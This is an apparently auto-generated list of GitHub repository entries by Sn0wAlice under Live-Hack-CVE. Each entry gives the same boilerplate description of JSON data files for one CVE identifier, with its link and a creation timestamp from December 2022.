**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19954 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19954](https://github.com/Live-Hack-CVE/CVE-2018-19954) create time: 2022-12-23T19:09:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19955 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19955](https://github.com/Live-Hack-CVE/CVE-2018-19955) create time: 2022-12-23T19:09:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19956 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19956](https://github.com/Live-Hack-CVE/CVE-2018-19956) create time: 2022-12-23T19:09:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15678 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15678](https://github.com/Live-Hack-CVE/CVE-2020-15678) create time: 2022-12-23T19:10:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15229](https://github.com/Live-Hack-CVE/CVE-2020-15229) create time: 2022-12-23T19:10:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27653 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27653](https://github.com/Live-Hack-CVE/CVE-2020-27653) create time: 2022-12-23T19:10:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27654](https://github.com/Live-Hack-CVE/CVE-2020-27654) create time: 2022-12-23T19:10:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11858](https://github.com/Live-Hack-CVE/CVE-2020-11858) create time: 2022-12-23T19:09:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25662 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25662](https://github.com/Live-Hack-CVE/CVE-2020-25662) create time: 2022-12-23T19:09:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27751 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27751](https://github.com/Live-Hack-CVE/CVE-2020-27751) create time: 2022-12-23T19:09:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26558](https://github.com/Live-Hack-CVE/CVE-2020-26558) create time: 2022-12-23T19:09:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11853](https://github.com/Live-Hack-CVE/CVE-2020-11853) create time: 2022-12-23T19:09:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36457 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36457](https://github.com/Live-Hack-CVE/CVE-2020-36457) create time: 2022-12-23T19:03:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12508 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12508](https://github.com/Live-Hack-CVE/CVE-2020-12508) create time: 2022-12-23T18:25:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12507](https://github.com/Live-Hack-CVE/CVE-2020-12507) create time: 2022-12-23T18:25:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24444](https://github.com/Live-Hack-CVE/CVE-2021-24444) create time: 2022-12-23T19:09:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41313](https://github.com/Live-Hack-CVE/CVE-2021-41313) create time: 2022-12-23T19:09:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27853](https://github.com/Live-Hack-CVE/CVE-2021-27853) create time: 2022-12-23T19:07:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38828 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38828](https://github.com/Live-Hack-CVE/CVE-2021-38828) create time: 2022-12-23T19:06:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38827 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38827](https://github.com/Live-Hack-CVE/CVE-2021-38827) create time: 2022-12-23T19:05:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20227](https://github.com/Live-Hack-CVE/CVE-2021-20227) create time: 2022-12-23T19:04:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32686 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32686](https://github.com/Live-Hack-CVE/CVE-2021-32686) create time: 2022-12-23T19:04:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41141](https://github.com/Live-Hack-CVE/CVE-2021-41141) create time: 2022-12-23T19:04:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45848 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45848](https://github.com/Live-Hack-CVE/CVE-2021-45848) create time: 2022-12-23T19:03:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28275](https://github.com/Live-Hack-CVE/CVE-2021-28275) create time: 2022-12-23T19:02:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28276 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28276](https://github.com/Live-Hack-CVE/CVE-2021-28276) create time: 2022-12-23T19:02:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28277](https://github.com/Live-Hack-CVE/CVE-2021-28277) create time: 2022-12-23T19:02:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28278 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28278](https://github.com/Live-Hack-CVE/CVE-2021-28278) create time: 2022-12-23T19:02:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35937](https://github.com/Live-Hack-CVE/CVE-2021-35937) create time: 2022-12-23T19:00:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40272 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40272](https://github.com/Live-Hack-CVE/CVE-2021-40272) create time: 2022-12-23T18:59:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33164](https://github.com/Live-Hack-CVE/CVE-2021-33164) create time: 2022-12-23T18:24:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40750 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40750](https://github.com/Live-Hack-CVE/CVE-2022-40750) create time: 2022-12-23T19:10:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36400 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36400](https://github.com/Live-Hack-CVE/CVE-2022-36400) create time: 2022-12-23T19:10:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36377 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36377](https://github.com/Live-Hack-CVE/CVE-2022-36377) create time: 2022-12-23T19:10:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41882 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41882](https://github.com/Live-Hack-CVE/CVE-2022-41882) create time: 2022-12-23T19:09:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25794 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25794](https://github.com/Live-Hack-CVE/CVE-2022-25794) create time: 2022-12-23T19:09:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1566](https://github.com/Live-Hack-CVE/CVE-2022-1566) create time: 2022-12-23T19:09:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27639 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27639](https://github.com/Live-Hack-CVE/CVE-2022-27639) create time: 2022-12-23T19:09:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32268 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32268](https://github.com/Live-Hack-CVE/CVE-2022-32268) create time: 2022-12-23T19:08:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27874 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27874](https://github.com/Live-Hack-CVE/CVE-2022-27874) create time: 2022-12-23T19:08:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41904 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41904](https://github.com/Live-Hack-CVE/CVE-2022-41904) create time: 2022-12-23T19:08:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36349 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36349](https://github.com/Live-Hack-CVE/CVE-2022-36349) create time: 2022-12-23T19:08:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28126](https://github.com/Live-Hack-CVE/CVE-2022-28126) create time: 2022-12-23T19:08:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36789 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36789](https://github.com/Live-Hack-CVE/CVE-2022-36789) create time: 2022-12-23T19:08:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36370 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36370](https://github.com/Live-Hack-CVE/CVE-2022-36370) create time: 2022-12-23T19:08:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37334 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37334](https://github.com/Live-Hack-CVE/CVE-2022-37334) create time: 2022-12-23T19:08:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2214 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2214](https://github.com/Live-Hack-CVE/CVE-2022-2214) create time: 2022-12-23T19:08:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38099](https://github.com/Live-Hack-CVE/CVE-2022-38099) create time: 2022-12-23T19:08:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37345 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37345](https://github.com/Live-Hack-CVE/CVE-2022-37345) create time: 2022-12-23T19:08:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25799](https://github.com/Live-Hack-CVE/CVE-2022-25799) create time: 2022-12-23T19:08:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41906](https://github.com/Live-Hack-CVE/CVE-2022-41906) create time: 2022-12-23T19:07:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28611 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28611](https://github.com/Live-Hack-CVE/CVE-2022-28611) create time: 2022-12-23T19:07:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26367 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26367](https://github.com/Live-Hack-CVE/CVE-2022-26367) create time: 2022-12-23T19:07:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25844](https://github.com/Live-Hack-CVE/CVE-2022-25844) create time: 2022-12-23T19:07:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29970](https://github.com/Live-Hack-CVE/CVE-2022-29970) create time: 2022-12-23T19:07:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26744](https://github.com/Live-Hack-CVE/CVE-2022-26744) create time: 2022-12-23T19:07:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43754 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43754](https://github.com/Live-Hack-CVE/CVE-2022-43754) create time: 2022-12-23T19:07:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32854](https://github.com/Live-Hack-CVE/CVE-2022-32854) create time: 2022-12-23T19:07:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1203](https://github.com/Live-Hack-CVE/CVE-2022-1203) create time: 2022-12-23T19:07:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37434](https://github.com/Live-Hack-CVE/CVE-2022-37434) create time: 2022-12-23T19:07:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43753 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43753](https://github.com/Live-Hack-CVE/CVE-2022-43753) create time: 2022-12-23T19:07:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-4802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-4802](https://github.com/Live-Hack-CVE/CVE-2011-4802) create time: 2022-12-23T18:20:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-4814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-4814](https://github.com/Live-Hack-CVE/CVE-2011-4814) create time: 2022-12-23T18:20:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-4329 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-4329](https://github.com/Live-Hack-CVE/CVE-2011-4329) create time: 2022-12-23T18:20:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1225 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1225](https://github.com/Live-Hack-CVE/CVE-2012-1225) create time: 2022-12-23T18:20:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1226 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1226](https://github.com/Live-Hack-CVE/CVE-2012-1226) create time: 2022-12-23T18:20:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2093 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2093](https://github.com/Live-Hack-CVE/CVE-2013-2093) create time: 2022-12-23T18:20:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2091 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2091](https://github.com/Live-Hack-CVE/CVE-2013-2091) create time: 2022-12-23T18:20:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2092 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2092](https://github.com/Live-Hack-CVE/CVE-2013-2092) create time: 2022-12-23T18:20:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3992](https://github.com/Live-Hack-CVE/CVE-2014-3992) create time: 2022-12-23T18:20:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3991 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3991](https://github.com/Live-Hack-CVE/CVE-2014-3991) create time: 2022-12-23T18:20:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-1000509 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-1000509](https://github.com/Live-Hack-CVE/CVE-2017-1000509) create time: 2022-12-23T18:20:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-17971 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-17971](https://github.com/Live-Hack-CVE/CVE-2017-17971) create time: 2022-12-23T18:20:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-17899 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-17899](https://github.com/Live-Hack-CVE/CVE-2017-17899) create time: 2022-12-23T18:20:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-17900 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-17900](https://github.com/Live-Hack-CVE/CVE-2017-17900) create time: 2022-12-23T18:19:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-17897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-17897](https://github.com/Live-Hack-CVE/CVE-2017-17897) create time: 2022-12-23T18:19:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-17898 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-17898](https://github.com/Live-Hack-CVE/CVE-2017-17898) create time: 2022-12-23T18:18:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7888](https://github.com/Live-Hack-CVE/CVE-2017-7888) create time: 2022-12-23T18:18:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7886](https://github.com/Live-Hack-CVE/CVE-2017-7886) create time: 2022-12-23T18:17:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7887](https://github.com/Live-Hack-CVE/CVE-2017-7887) create time: 2022-12-23T18:17:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8879 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8879](https://github.com/Live-Hack-CVE/CVE-2017-8879) create time: 2022-12-23T17:47:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2928](https://github.com/Live-Hack-CVE/CVE-2017-2928) create time: 2022-12-23T17:46:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2931](https://github.com/Live-Hack-CVE/CVE-2017-2931) create time: 2022-12-23T17:45:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2938 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2938](https://github.com/Live-Hack-CVE/CVE-2017-2938) create time: 2022-12-23T17:45:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2930](https://github.com/Live-Hack-CVE/CVE-2017-2930) create time: 2022-12-23T17:45:51Z

